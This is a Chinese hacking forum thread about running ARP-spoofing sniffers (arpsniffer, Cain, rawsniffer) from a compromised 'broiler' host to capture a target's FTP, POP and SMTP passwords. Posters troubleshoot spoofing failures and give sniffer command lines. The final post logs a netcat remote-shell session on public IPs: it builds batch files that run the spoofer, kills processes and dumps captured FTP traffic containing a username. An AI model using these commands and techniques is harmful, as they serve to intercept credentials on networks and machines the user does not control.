议题作者：sniper
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

看了论坛上有不少关于arpsniffer的讨论,这段时间也在研究arpsniiffer这个东西,以前没环境,呵呵,现在3台电脑勉强可以自己测试些东西了.我用的是cain.虽然个人来说我还是喜欢小榕那个arpsniifer的GUI版和cain版结合用...不过进年可耻的发现我的arpsniifer的GUI版过期了,让我下新版本,如果改日期的话会提示升级,升级后是限制使用次数和时间的。...有点不爽...以下我先说一些我这段时间遇见一些问题的解答,大家有什么经验的,下面跟贴.我会保持此贴的更新,问题,答案全部集中起来,以便查阅.

以下内容,我们自己的机器称为A,肉鸡为B,目标为C,我们假设在B上sniifer,意图获取C上的信息.

1.sniifer开始后,B出现不稳定情况,或者C不稳定.B,C是同段
B不稳定建议使用AT定时K掉进程,一般在数据量大的时候出现此情况.
C不稳定我只遇见一种,B,C是同段,在B上其实是可以ping通C的,只是我们,例如在A上无法访问而已.通常停止arp欺骗一段时间就可以恢复.


2.使用arpsniifer的时候出现Spoof2 Can'nt Open Driver
驱动安装原因,建议使用3.0的.如果不行卸掉,再装2.1,一般2.1的环境下arpsniifer绝对没问题,cain有问题就是了-_-!

3.嗅探开始后,收到的全部是B上的数据包,没有任何C的数据包.
cain出现这个情况一般是在arp欺骗的设置上出了问题,修改即可解决.


下面是我现在也没搞明白的问题了,召唤强人解答.


4.cain安装后,B上只有一块网卡,按一般情况来说,网卡上会有IP信息一类.
但是此时cain在config时网卡上显示的IP不是B的外网IP,而是0.0.0.0
如果此时开始扫描MAC地址的话,就根本不能如我们所愿了....求其原因.



5.
B,C的IP如下
B  --> 66.1.1.4
C --> 66.1.1.8
在B上可知网关为 66.1.1.1
在B上tracert返回不是<10ms一类的信息,返回是* * * *这样.
但是如果在B上pingC, 然后arp -a查看,C的MAC地址会出现.说明B,C应该还是在一台路由之下.
但是问题是,如果我在B上开始sniffer,驱动都安装好的.arp欺骗设置也是对的.然后开始嗅探,所得数据却还是B的数据,而目标C的数据一个都没有....有点郁闷,还望达人解惑


另小声的说一句,斑竹能不能将此贴置顶一段时间,嘿嘿.....

arpsniffer 驱动总是装错

我还是喜欢X-Sniff和rawsniffer.
X-Sniff有个缺点,他能嗅探
-tcp
-udp
-icmp
这3个协议的密码,不过范围似乎有点大了,通宵嗅的是tcp上面的password,这时,不论管理员的会员的等等,都来了,那包简直很大了,麻烦.

rawsniffer比较好使,嗅的方向比较指出来了:
-sniffsmtp
-sniffpop
-sniffpost
-sniffftp
-sniffteln
-sniffpack

如果嗅探ftp密码.rawsniffer.exe -di 192.168.1.5 -sniffftp -o c:\test.txt
自我感觉,他有一个参数-dp指定端口的,似乎好像没有用处
比如rawsniffer -di 192.168.1.3 -dp 21 -o c:\test.txt
嗅不出来ftp密码.当然了,实践是-sniffftp 和 -dp是不能在一起使用的.

arpsniffer我一直驱动装得太烦了,不好成功,所以比较喜欢上面2个嗅探了.呵呵
一点自己实践的补充~ 还有很多不足之处,下面继续:)
[s:52]  [s:52]  [s:52]

楼上网络概念不清晰
arp是基于交换环境欺骗.一般用wincap包编写,所以要装驱动.
rawsniffer是基于raw,底层套接字欺骗,只能用于集线器下.直接用c构造数据包就行,不用装驱动.
欺骗的环境不同,无法比较好坏.

5.
B,C的IP如下
B --> 66.1.1.4
C --> 66.1.1.8
在B上可知网关为 66.1.1.1
在B上tracert返回不是<10ms一类的信息,返回是* * * *这样.
但是如果在B上pingC, 然后arp -a查看,C的MAC地址会出现.说明B,C应该还是在一台路由之下.
但是问题是,如果我在B上开始sniffer,驱动都安装好的.arp欺骗设置也是对的.然后开始嗅探,所得数据却还是B的数据,而目标C的数据一个都没有....有点郁闷,还望达人解惑



这个问题我又看了下．cain的确不能嗅到数据，但是用小榕那个switchsniffer和ＩＲＩＳ结合一起搞可以嗅到目标的信息，但是数据不全．
例如说ＦＴＰ的话，只能嗅到服务器返回的信息，不能嗅到发给目标服务器的信息．也就是sniper　login或者sniper　not　login这样服务器返回的信息，而发送给服务器的用户名密码都得不到．．．．不知道是何解，召唤强人解答

我使用的小榕的arpsniff，环境为公网。[电信机房]

sniper的疑惑可能是内网的关系。在公网中 网关G，目标机B，嗅探机A。
我占有A，监视G->B的数据包。这些包是从用户机器U-->G-->A[混杂]-->B。
Usage: ArpSniffer <IP1 GATE> <IP2 TARGER> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]
比如监视FTP，U发送用户和密码到B的21，将被A机器截取。而自己3台机器的话，没有外面用户通过路由器传数据给C，那就没有C的数据了。在我看来只是hub上的数据传输而没经过路由。
ArpSniffer B G 21 <LogFile> <NetAdp> [/RESET]
将监视B->G的数据，那样只能看到服务器传给用户的数据。这个工具是单向的。
或许这没按照sniper的思路解答，但是我自信把arpsniff工作情况简单介绍了。

楼上所说的工作情况的确很详细.
我说的只能嗅服务器返回信息而嗅不到发送给服务器的信息是在公网上的情况.
我是双向欺骗,应该能嗅到所有数据的.
昨天有人给了我一个可能性,那就是网关对MAC和IP做了绑定,所以只成功的欺骗了目标C,让起认为我是网关,而网关并没有认为我是目标.所以我只收到了目标的返回信息,而收不到网关发给目标的信息.
当然只是一种推论....需要证实.不知道有没有办法可以直接判断网关是否做了这种处理

这样吧，我给一个环境，用你那边的程序到这个环境来测试。下面是我在这个环境中的测试情况。
===========================================
local>nc syzx.yincool.com port

C:\WINNT\system32>ipconfig
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 220.194.169.101
Default Gateway . . . . . . . . . : 220.194.169.97
Network Adapter 0: Intel(R) PRO/1000 MT Network Connection


C:\WINNT\system32>echo ars 220.194.169.97 220.194.169.102 21 c:\winnt\system32\get102.dat 0 >doar102.bat
C:\WINNT\system32>echo ars 220.194.169.97 220.194.169.102 21 c:\winnt\system32\set102.dat 0 /reset >setar102.bat
C:\WINNT\system32>start doar102.bat
-----------------------------------
local-->ftp 220.194.169.102
220 Serv-U FTP Server v6.1 for WinSock ready...
User (220.194.169.102:(none)): testuser
------------------------------------
remote-->
C:\WINNT\system32>kill ars
C:\WINNT\system32>start setar102.bat
C:\WINNT\system32>kill ars
C:\WINNT\system32>type get102.dat
220.194.169.102(21)->220.194.169.102(1248)
20 Serv-U FTP Server v6.1 for WinSock ready...
220.194.169.102(21)->220.194.169.102(1248)s
0 Serv-U FTP Server v6.1 for WinSock ready...
myIP(1248)->myIP(21)?
R testuser
myIP(1248)->myIP(21)
testuser
220.194.169.102(21)->220.194.169.102(1248)
ser name okay, need password.